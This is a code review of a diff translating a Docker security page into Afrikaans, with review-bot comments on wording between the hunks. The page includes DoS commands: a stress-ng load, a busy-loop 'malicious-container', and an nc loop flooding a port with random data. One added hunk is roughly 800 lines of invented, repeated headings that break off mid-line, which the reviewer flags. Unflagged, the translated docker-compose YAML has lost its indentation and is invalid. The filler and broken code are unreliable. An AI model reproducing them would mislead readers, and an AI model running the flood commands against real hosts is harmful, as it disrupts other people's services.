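Review bot: this hunk uses `Kontainer(s)` throughout the cgroups paragraph (`+Docker maak dit moontlik om Kontainers te skep`, `Kontainer se CPU-gebruik`) but `houer` a few lines later (`+Om die cgroup van 'n houer te kry`), and the headings in the previous hunk also say `Kontainer` while the rest of the file says `houer`; settle on one term for the whole file. In `+Docker maak gebruik van die Linux-kernel se bevoegdheidseienskapfunksie om` the compound stacks three nouns for "capability feature"; `die Linux-kernel se bevoegdheidskenmerk` is enough. Unchanged context worth a separate fix: the comment `#Run a large sleep inside a Debian container` sits next to the image name `denial`, which should be `debian`.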
@@ -223,7 +206,7 @@ When a docker container is run, the **process drops sensitive capabilities that ### Seccomp in Docker -This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container: +Dit is 'n sekuriteitskenmerk wat Docker in staat stel om **die syscalls wat binne die houer gebruik kan word te beperk**: {% content-ref url="seccomp.md" %} [seccomp.md](seccomp.md) @@ -231,7 +214,7 @@ This is a security feature that allows Docker to **limit the syscalls** that can ### AppArmor in Docker -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.: +**AppArmor** is 'n kernel-verbetering om **houers** tot 'n **beperkte** stel **hulpbronne** met **per-program profiele** te beperk: {% content-ref url="apparmor.md" %} [apparmor.md](apparmor.md) 
@@ -239,13 +222,13 @@ This is a security feature that allows Docker to **limit the syscalls** that can ### SELinux in Docker -- **Labeling System**: SELinux assigns a unique label to every process and filesystem object. -- **Policy Enforcement**: It enforces security policies that define what actions a process label can perform on other labels within the system. -- **Container Process Labels**: When container engines initiate container processes, they are typically assigned a confined SELinux label, commonly `container_t`. -- **File Labeling within Containers**: Files within the container are usually labeled as `container_file_t`. -- **Policy Rules**: The SELinux policy primarily ensures that processes with the `container_t` label can only interact (read, write, execute) with files labeled as `container_file_t`. +- **Etiketteringstelsel**: SELinux ken 'n unieke etiket toe aan elke proses en lêerstelselobjek. +- **Beleidshandhawing**: Dit dwing sekuriteitsbeleide af wat bepaal watter aksies 'n prosesetiket binne die stelsel op ander etikette kan uitvoer. +- **Houerprosesetikette**: Wanneer houermotors houerprosesse inisieer, word hulle gewoonlik toegewys aan 'n beperkte SELinux-etiket, gewoonlik `container_t`. +- **Lêeretikettering binne houers**: Lêers binne die houer word gewoonlik geëtiketteer as `container_file_t`. +- **Beleidsreëls**: Die SELinux-beleid verseker hoofsaaklik dat prosesse met die `container_t`-etiket slegs kan interaksie hê (lees, skryf, uitvoer) met lêers wat geëtiketteer is as `container_file_t`. -This mechanism ensures that even if a process within a container is compromised, it's confined to interacting only with objects that have the corresponding labels, significantly limiting the potential damage from such compromises. 
+Hierdie meganisme verseker dat selfs as 'n proses binne 'n houer gekompromitteer word, dit beperk is tot interaksie slegs met objekte wat die ooreenstemmende etikette het, wat die potensiële skade van sulke kompromitterings aansienlik beperk. {% content-ref url="../selinux.md" %} [selinux.md](../selinux.md) 
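Review bot: `+- **Houerprosesetikette**: Wanneer houermotors houerprosesse inisieer` translates `container engines` as `houermotors`, which reads as vehicle engines; the file already uses `Docker-engine` for the daemon, so `houer-engines` (or `houerenjins`) keeps the term recognisable. The SELinux label names `container_t` and `container_file_t` are correctly left untranslated in the rest of the hunk.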
@@ -253,23 +236,22 @@ This mechanism ensures that even if a process within a container is compromised, ### AuthZ & AuthN -In Docker, an authorization plugin plays a crucial role in security by deciding whether to allow or block requests to the Docker daemon. This decision is made by examining two key contexts: +In Docker speel 'n outorisasie-inprop 'n belangrike rol in sekuriteit deur te besluit of versoek aan die Docker-daemon toegelaat of geblokkeer moet word. Hierdie besluit word geneem deur twee sleutelkontekste te ondersoek: -- **Authentication Context**: This includes comprehensive information about the user, such as who they are and how they've authenticated themselves. -- **Command Context**: This comprises all pertinent data related to the request being made. +- **Outentiseringskonteks**: Dit sluit omvattende inligting oor die gebruiker in, soos wie hulle is en hoe hulle hulself geoutentiseer het. +- **Opdragkonteks**: Dit bestaan uit alle relevante data wat verband hou met die gedane versoek. -These contexts help ensure that only legitimate requests from authenticated users are processed, enhancing the security of Docker operations. +Hierdie kontekste help verseker dat slegs legitieme versoek van geoutentiseerde gebruikers verwerk word, wat die sekuriteit van Docker-operasies verbeter. {% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %} [authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md) {% endcontent-ref %} -## DoS from a container +## DoS vanuit 'n houer -If you are not properly limiting the resources a container can use, a compromised container could DoS the host where it's running. +As jy nie die hulpbronne wat 'n houer kan gebruik behoorlik beperk nie, kan 'n gekompromitteerde houer die gasheer waarop dit uitgevoer word, DoS (versteurings van diens) gee. * CPU DoS - ```bash # stress-ng sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t 5m 
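Review bot: `+... of versoek aan die Docker-daemon toegelaat of geblokkeer moet word` and `+... dat slegs legitieme versoek van geoutentiseerde gebruikers verwerk word` use the singular `versoek` where the source has plural `requests`; both should be `versoeke`. In the DoS paragraph, `DoS (versteurings van diens)` is not the established term; `diensweiering` is what Afrikaans security texts use for denial of service, and the abbreviation should stay `DoS`. The blank line between `* CPU DoS` and its bash fence is dropped here too.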
@@ -277,18 +259,15 @@ sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t # While loop docker run -d --name malicious-container -c 512 busybox sh -c 'while true; do :; done' ``` - -* Bandwidth DoS - +* Bandwydte DoS ```bash nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; done ``` +## Interessante Docker-vlae -## Interesting Docker Flags +### --privileged-vlag -### --privileged flag - -In the following page you can learn **what does the `--privileged` flag imply**: +Op die volgende bladsy kan jy leer **wat impliseer die `--privileged`-vlag**: {% content-ref url="docker-privileged.md" %} [docker-privileged.md](docker-privileged.md) 
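Review bot: `+Op die volgende bladsy kan jy leer **wat impliseer die `--privileged`-vlag**` keeps English word order inside the subordinate clause; Afrikaans puts the verb last, so `**wat die `--privileged`-vlag impliseer**`. The hunk also removes the blank line between `+* Bandwydte DoS` and its fence, consistent with the whitespace changes flagged in the earlier hunks.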
@@ -298,16 +277,847 @@ In the following page you can learn **what does the `--privileged` flag imply**: #### no-new-privileges -If you are running a container where an attacker manages to get access as a low privilege user. If you have a **miss-configured suid binary**, the attacker may abuse it and **escalate privileges inside** the container. Which, may allow him to escape from it. - -Running the container with the **`no-new-privileges`** option enabled will **prevent this kind of privilege escalation**. +As jy 'n houer hardloop waar 'n aanvaller toegang kry as 'n gebruiker met lae bevoegdhede. As jy 'n **verkeerd gekonfigureerde suid-binêre lêer** het, kan die aanvaller dit misbruik en **bevoegdhede binne die houer verhoog**. Dit kan hom in staat stel om daaruit te ontsnap. +Deur die houer met die **`no-new-privileges`**-opsie geaktiveer te hardloop, sal dit **hierdie soort bevoegdheidsverhoging voorkom**. ``` docker run -it --security-opt=no-new-privileges:true nonewpriv ``` +#### Ander -#### Other +--- +### Docker Security + +### Docker Sekuriteit + +--- + +#### Docker Security Cheat Sheet + +#### Docker Sekuriteit Spiekbriefie + +--- + +#### Docker Security Best Practices + +#### Docker Sekuriteit Beste Praktyke + +--- + +#### Docker Security Tools + +#### Docker Sekuriteit Gereedskap + +--- + +#### Docker Security Vulnerabilities + +#### Docker Sekuriteit Swakhede + +--- + +#### Docker Security Resources + +#### Docker Sekuriteit Hulpbronne + +--- + +#### Docker Security Checklist + +#### Docker Sekuriteit Kontrolelys + +--- + +#### Docker Security Tips + +#### Docker Sekuriteit Wenke + +--- + +#### Docker Security Hardening + +#### Docker Sekuriteit Verharding + +--- + +#### Docker Security Auditing + +#### Docker Sekuriteit Oudit + +--- + +#### Docker Security Incident Response + +#### Docker Sekuriteit Insident Reaksie + +--- + +#### Docker Security Monitoring + +#### Docker Sekuriteit Monitering + +--- + +#### Docker Security Training + +#### Docker 
Sekuriteit Opleiding + +--- + +#### Docker Security Challenges + +#### Docker Sekuriteit Uitdagings + +--- + +#### Docker Security Best Practices for Developers + +#### Docker Sekuriteit Beste Praktyke vir Ontwikkelaars + +--- + +#### Docker Security Best Practices for Operations + +#### Docker Sekuriteit Beste Praktyke vir Operasies + +--- + +#### Docker Security Best Practices for DevOps + +#### Docker Sekuriteit Beste Praktyke vir DevOps + +--- + +#### Docker Security Best Practices for CI/CD + +#### Docker Sekuriteit Beste Praktyke vir CI/CD + +--- + +#### Docker Security Best Practices for Kubernetes + +#### Docker Sekuriteit Beste Praktyke vir Kubernetes + +--- + +#### Docker Security Best Practices for AWS + +#### Docker Sekuriteit Beste Praktyke vir AWS + +--- + +#### Docker Security Best Practices for Azure + +#### Docker Sekuriteit Beste Praktyke vir Azure + +--- + +#### Docker Security Best Practices for GCP + +#### Docker Sekuriteit Beste Praktyke vir GCP + +--- + +#### Docker Security Best Practices for DigitalOcean + +#### Docker Sekuriteit Beste Praktyke vir DigitalOcean + +--- + +#### Docker Security Best Practices for Alibaba Cloud + +#### Docker Sekuriteit Beste Praktyke vir Alibaba Cloud + +--- + +#### Docker Security Best Practices for IBM Cloud + +#### Docker Sekuriteit Beste Praktyke vir IBM Cloud + +--- + +#### Docker Security Best Practices for Oracle Cloud + +#### Docker Sekuriteit Beste Praktyke vir Oracle Cloud + +--- + +#### Docker Security Best Practices for Heroku + +#### Docker Sekuriteit Beste Praktyke vir Heroku + +--- + +#### Docker Security Best Practices for OpenShift + +#### Docker Sekuriteit Beste Praktyke vir OpenShift + +--- + +#### Docker Security Best Practices for Rancher + +#### Docker Sekuriteit Beste Praktyke vir Rancher + +--- + +#### Docker Security Best Practices for Nomad + +#### Docker Sekuriteit Beste Praktyke vir Nomad + +--- + +#### Docker Security Best Practices for Jenkins + +#### Docker Sekuriteit Beste 
Praktyke vir Jenkins + +--- + +#### Docker Security Best Practices for GitLab + +#### Docker Sekuriteit Beste Praktyke vir GitLab + +--- + +#### Docker Security Best Practices for Bitbucket + +#### Docker Sekuriteit Beste Praktyke vir Bitbucket + +--- + +#### Docker Security Best Practices for CircleCI + +#### Docker Sekuriteit Beste Praktyke vir CircleCI + +--- + +#### Docker Security Best Practices for Travis CI + +#### Docker Sekuriteit Beste Praktyke vir Travis CI + +--- + +#### Docker Security Best Practices for GitHub Actions + +#### Docker Sekuriteit Beste Praktyke vir GitHub Actions + +--- + +#### Docker Security Best Practices for Jenkins X + +#### Docker Sekuriteit Beste Praktyke vir Jenkins X + +--- + +#### Docker Security Best Practices for Spinnaker + +#### Docker Sekuriteit Beste Praktyke vir Spinnaker + +--- + +#### Docker Security Best Practices for TeamCity + +#### Docker Sekuriteit Beste Praktyke vir TeamCity + +--- + +#### Docker Security Best Practices for Bamboo + +#### Docker Sekuriteit Beste Praktyke vir Bamboo + +--- + +#### Docker Security Best Practices for GoCD + +#### Docker Sekuriteit Beste Praktyke vir GoCD + +--- + +#### Docker Security Best Practices for Drone + +#### Docker Sekuriteit Beste Praktyke vir Drone + +--- + +#### Docker Security Best Practices for Argo CD + +#### Docker Sekuriteit Beste Praktyke vir Argo CD + +--- + +#### Docker Security Best Practices for Harbor + +#### Docker Sekuriteit Beste Praktyke vir Harbor + +--- + +#### Docker Security Best Practices for Artifactory + +#### Docker Sekuriteit Beste Praktyke vir Artifactory + +--- + +#### Docker Security Best Practices for Nexus + +#### Docker Sekuriteit Beste Praktyke vir Nexus + +--- + +#### Docker Security Best Practices for Sonatype + +#### Docker Sekuriteit Beste Praktyke vir Sonatype + +--- + +#### Docker Security Best Practices for JFrog + +#### Docker Sekuriteit Beste Praktyke vir JFrog + +--- + +#### Docker Security Best Practices for Docker Hub + +#### 
Docker Sekuriteit Beste Praktyke vir Docker Hub + +--- + +#### Docker Security Best Practices for Quay + +#### Docker Sekuriteit Beste Praktyke vir Quay + +--- + +#### Docker Security Best Practices for Container Registry + +#### Docker Sekuriteit Beste Praktyke vir Houderversameling + +--- + +#### Docker Security Best Practices for Container Runtime + +#### Docker Sekuriteit Beste Praktyke vir Houvertyd + +--- + +#### Docker Security Best Practices for Container Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverorkestrering + +--- + +#### Docker Security Best Practices for Container Networking + +#### Docker Sekuriteit Beste Praktyke vir Houvernetwerking + +--- + +#### Docker Security Best Practices for Container Storage + +#### Docker Sekuriteit Beste Praktyke vir Houverstoor + +--- + +#### Docker Security Best Practices for Container Monitoring + +#### Docker Sekuriteit Beste Praktyke vir Houvermonitering + +--- + +#### Docker Security Best Practices for Container Logging + +#### Docker Sekuriteit Beste Praktyke vir Houverlog + +--- + +#### Docker Security Best Practices for Container Tracing + +#### Docker Sekuriteit Beste Praktyke vir Houvernaspeuring + +--- + +#### Docker Security Best Practices for Container Vulnerability Scanning + +#### Docker Sekuriteit Beste Praktyke vir Houverkwesbaarheidsskandering + +--- + +#### Docker Security Best Practices for Container Image Scanning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldskandering + +--- + +#### Docker Security Best Practices for Container Image Signing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldondertekening + +--- + +#### Docker Security Best Practices for Container Image Hardening + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverharding + +--- + +#### Docker Security Best Practices for Container Image Lifecycle Management + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldlewenssiklusbestuur + +--- + +#### Docker Security Best Practices for Container 
Image Registry + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldregister + +--- + +#### Docker Security Best Practices for Container Image Repository + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldbewaarplek + +--- + +#### Docker Security Best Practices for Container Image Distribution + +#### Docker Sekuriteit Beste Praktyke vir Houverbeelddistribusie + +--- + +#### Docker Security Best Practices for Container Image Updates + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldopdaterings + +--- + +#### Docker Security Best Practices for Container Image Versioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldweergawes + +--- + +#### Docker Security Best Practices for Container Image Tagging + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldmerking + +--- + +#### Docker Security Best Practices for Container Image Pulling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldtrekking + +--- + +#### Docker Security Best Practices for Container Image Pushing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldstoot + +--- + +#### Docker Security Best Practices for Container Image Building + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldbou + +--- + +#### Docker Security Best Practices for Container Image Packaging + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverpakking + +--- + +#### Docker Security Best Practices for Container Image Distribution + +#### Docker Sekuriteit Beste Praktyke vir Houverbeelddistribusie + +--- + +#### Docker Security Best Practices for Container Image Validation + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldgeldigheid + +--- + +#### Docker Security Best Practices for Container Image Verification + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverifikasie + +--- + +#### Docker Security Best Practices for Container Image Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldimplementering + +--- + +#### Docker Security Best Practices for Container Image 
Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldterugrol + +--- + +#### Docker Security Best Practices for Container Image Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldopruiming + +--- + +#### Docker Security Best Practices for Container Image Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldrugsteun + +--- + +#### Docker Security Best Practices for Container Image Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldherstel + +--- + +#### Docker Security Best Practices for Container Image Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldmigrasie + +--- + +#### Docker Security Best Practices for Container Image Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldverdubbeling + +--- + +#### Docker Security Best Practices for Container Image Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldskaling + +--- + +#### Docker Security Best Practices for Container Image Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldlasbalansering + +--- + +#### Docker Security Best Practices for Container Image High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldhoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldfouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Disaster Recovery + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldrampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Healing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese genesing + +--- + +#### Docker Security Best Practices for Container Image Auto Repair + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + 
+--- + +#### Docker Security Best Practices for Container Image Auto Update + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opdatering + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + +--- + +#### Docker Security Best Practices for Container Image Auto Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese migrasie + +--- + +#### Docker Security Best Practices for Container Image Auto Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese verdubbeling + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese lasbalansering + +--- + +#### Docker Security Best Practices for Container Image Auto High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese hoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Auto Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese fouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Auto Disaster Recovery + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese orkestrering + +--- + +#### Docker Security Best Practices for Container Image Auto Provisioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese voorsiening + +--- + +#### Docker Security Best 
Practices for Container Image Auto Configuration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese konfigurasie + +--- + +#### Docker Security Best Practices for Container Image Auto Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese implementering + +--- + +#### Docker Security Best Practices for Container Image Auto Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese terugrol + +--- + +#### Docker Security Best Practices for Container Image Auto Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opruiming + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + +--- + +#### Docker Security Best Practices for Container Image Auto Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese migrasie + +--- + +#### Docker Security Best Practices for Container Image Auto Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese verdubbeling + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese lasbalansering + +--- + +#### Docker Security Best Practices for Container Image Auto High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese hoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Auto Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese fouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Auto Disaster Recovery 
+ +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese orkestrering + +--- + +#### Docker Security Best Practices for Container Image Auto Provisioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese voorsiening + +--- + +#### Docker Security Best Practices for Container Image Auto Configuration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese konfigurasie + +--- + +#### Docker Security Best Practices for Container Image Auto Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese implementering + +--- + +#### Docker Security Best Practices for Container Image Auto Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese terugrol + +--- + +#### Docker Security Best Practices for Container Image Auto Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opruiming + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese herstel + +--- + +#### Docker Security Best Practices for Container Image Auto Migration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese migrasie + +--- + +#### Docker Security Best Practices for Container Image Auto Replication + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese verdubbeling + +--- + +#### Docker Security Best Practices for Container Image Auto Scaling + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese skaling + +--- + +#### Docker Security Best Practices for Container Image Auto Load Balancing + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese 
lasbalansering + +--- + +#### Docker Security Best Practices for Container Image Auto High Availability + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese hoë beskikbaarheid + +--- + +#### Docker Security Best Practices for Container Image Auto Fault Tolerance + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese fouttoleransie + +--- + +#### Docker Security Best Practices for Container Image Auto Disaster Recovery + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rampherstel + +--- + +#### Docker Security Best Practices for Container Image Auto Orchestration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese orkestrering + +--- + +#### Docker Security Best Practices for Container Image Auto Provisioning + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese voorsiening + +--- + +#### Docker Security Best Practices for Container Image Auto Configuration + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese konfigurasie + +--- + +#### Docker Security Best Practices for Container Image Auto Deployment + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese implementering + +--- + +#### Docker Security Best Practices for Container Image Auto Rollback + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese terugrol + +--- + +#### Docker Security Best Practices for Container Image Auto Cleanup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese opruiming + +--- + +#### Docker Security Best Practices for Container Image Auto Backup + +#### Docker Sekuriteit Beste Praktyke vir Houverbeeldoutomatiese rugsteun + +--- + +#### Docker Security Best Practices for Container Image Auto Restore + +#### Docker Sekuriteit Beste Praktyke ```bash #You can manually add/drop capabilities with --cap-add 
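Review bot: the `+` lines of this hunk are not a translation of the English page but a run of invented headings, and the hunk should be regenerated from the source rather than merged. From `#### Docker Sekuriteit Uitdagings` onward the workflow emits hundreds of paired English/Afrikaans headings that do not exist in the original (`#### Docker Security Best Practices for Jenkins`, `... for GitLab`, `... for Container Image Auto Load Balancing`, and so on), and the block of `Container Image Auto ...` headings is repeated verbatim three times. The run then stops mid-sentence at `#### Docker Sekuriteit Beste Praktyke ```bash`, so the heading is left unterminated and runs straight into the `--cap-add` code fence, and whatever original text sat between the `--security-opt` discussion and that code block has been dropped. The `+1132,118` offset in the following `@@` header shows the size of the insertion: roughly 800 lines of filler pushed into the middle of the page. Translated jargon in the same run (`Houverbeeld`, `Houvertyd`, `Houverversameling`) is also not recognisable Afrikaans for "container image", "container runtime" or "container registry"; keep those terms in English as the rest of the translation does.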
@@ -322,134 +1132,118 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv # You can manually disable selinux in docker with --security-opt label:disable ``` +Vir meer **`--security-opt`** opsies, kyk na: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) -For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) +## Ander Sekuriteits-oorwegings -## Other Security Considerations +### Bestuur van Geheime: Beste Praktyke -### Managing Secrets: Best Practices +Dit is noodsaaklik om te vermy dat geheime direk in Docker-beelde ingebed word of dat omgewingsveranderlikes gebruik word, aangesien hierdie metodes jou sensitiewe inligting blootstel aan enige persoon met toegang tot die houer deur bevele soos `docker inspect` of `exec`. -It's crucial to avoid embedding secrets directly in Docker images or using environment variables, as these methods expose your sensitive information to anyone with access to the container through commands like `docker inspect` or `exec`. +**Docker volumes** is 'n veiliger alternatief wat aanbeveel word vir die toegang tot sensitiewe inligting. Dit kan gebruik word as 'n tydelike lêersisteem in die geheue, wat die risiko's wat verband hou met `docker inspect` en logboekinskrywings verminder. Nietemin kan root-gebruikers en diegene met `exec`-toegang tot die houer steeds toegang verkry tot die geheime. -**Docker volumes** are a safer alternative, recommended for accessing sensitive information. They can be utilized as a temporary filesystem in memory, mitigating the risks associated with `docker inspect` and logging. However, root users and those with `exec` access to the container might still access the secrets. +**Docker geheime** bied 'n selfs veiliger metode vir die hantering van sensitiewe inligting. 
Vir gevalle waar geheime tydens die beeldboufase benodig word, bied **BuildKit** 'n doeltreffende oplossing met ondersteuning vir geheime tydens die boufase, wat die bou spoed verbeter en addisionele funksies bied. -**Docker secrets** offer an even more secure method for handling sensitive information. For instances requiring secrets during the image build phase, **BuildKit** presents an efficient solution with support for build-time secrets, enhancing build speed and providing additional features. +Om BuildKit te benut, kan dit op drie maniere geaktiveer word: -To leverage BuildKit, it can be activated in three ways: - -1. Through an environment variable: `export DOCKER_BUILDKIT=1` -2. By prefixing commands: `DOCKER_BUILDKIT=1 docker build .` -3. By enabling it by default in the Docker configuration: `{ "features": { "buildkit": true } }`, followed by a Docker restart. - -BuildKit allows for the use of build-time secrets with the `--secret` option, ensuring these secrets are not included in the image build cache or the final image, using a command like: +1. Deur 'n omgewingsveranderlike: `export DOCKER_BUILDKIT=1` +2. Deur bevele te voorvoeg: `DOCKER_BUILDKIT=1 docker build .` +3. Deur dit standaard in die Docker-konfigurasie te aktiveer: `{ "features": { "buildkit": true } }`, gevolg deur 'n herlaai van Docker. +BuildKit maak die gebruik van geheime tydens die boufase moontlik met die `--secret` opsie, wat verseker dat hierdie geheime nie ingesluit word in die beeldboukas of die finale beeld nie, deur 'n bevel soos die volgende te gebruik: ```bash docker build --secret my_key=my_value ,src=path/to/my_secret_file . ``` +Vir geheime wat nodig is in 'n lopende houer, bied **Docker Compose en Kubernetes** robuuste oplossings. 
Docker Compose maak gebruik van 'n `secrets` sleutel in die diensdefinisie om geheime lêers te spesifiseer, soos getoon in 'n voorbeeld van 'n `docker-compose.yml`: -For secrets needed in a running container, **Docker Compose and Kubernetes** offer robust solutions. Docker Compose utilizes a `secrets` key in the service definition for specifying secret files, as shown in a `docker-compose.yml` example: +```yaml +services: + myservice: + secrets: + - mysecret +secrets: + mysecret: + file: ./path/to/secret/file +``` +In hierdie voorbeeld word 'n diens genaamd `myservice` gedefinieer wat 'n geheim genaamd `mysecret` gebruik. Die geheime lêer word gespesifiseer deur die `file` sleutel in die `secrets` afdeling. ```yaml version: "3.7" services: - my_service: - image: centos:7 - entrypoint: "cat /run/secrets/my_secret" - secrets: - - my_secret +my_service: +image: centos:7 +entrypoint: "cat /run/secrets/my_secret" secrets: - my_secret: - file: ./my_secret_file.txt +- my_secret +secrets: +my_secret: +file: ./my_secret_file.txt ``` +Hierdie konfigurasie maak die gebruik van geheime moontlik wanneer dienste met Docker Compose begin word. -This configuration allows for the use of secrets when starting services with Docker Compose. - -In Kubernetes environments, secrets are natively supported and can be further managed with tools like [Helm-Secrets](https://github.com/futuresimple/helm-secrets). Kubernetes' Role Based Access Controls (RBAC) enhances secret management security, similar to Docker Enterprise. +In Kubernetes-omgewings word geheime outomaties ondersteun en kan dit verder bestuur word met gereedskap soos [Helm-Secrets](https://github.com/futuresimple/helm-secrets). Kubernetes se Rol Gebaseerde Toegangsbeheer (RBAC) verbeter die veiligheid van geheimbestuur, soortgelyk aan Docker Enterprise. ### gVisor -**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. 
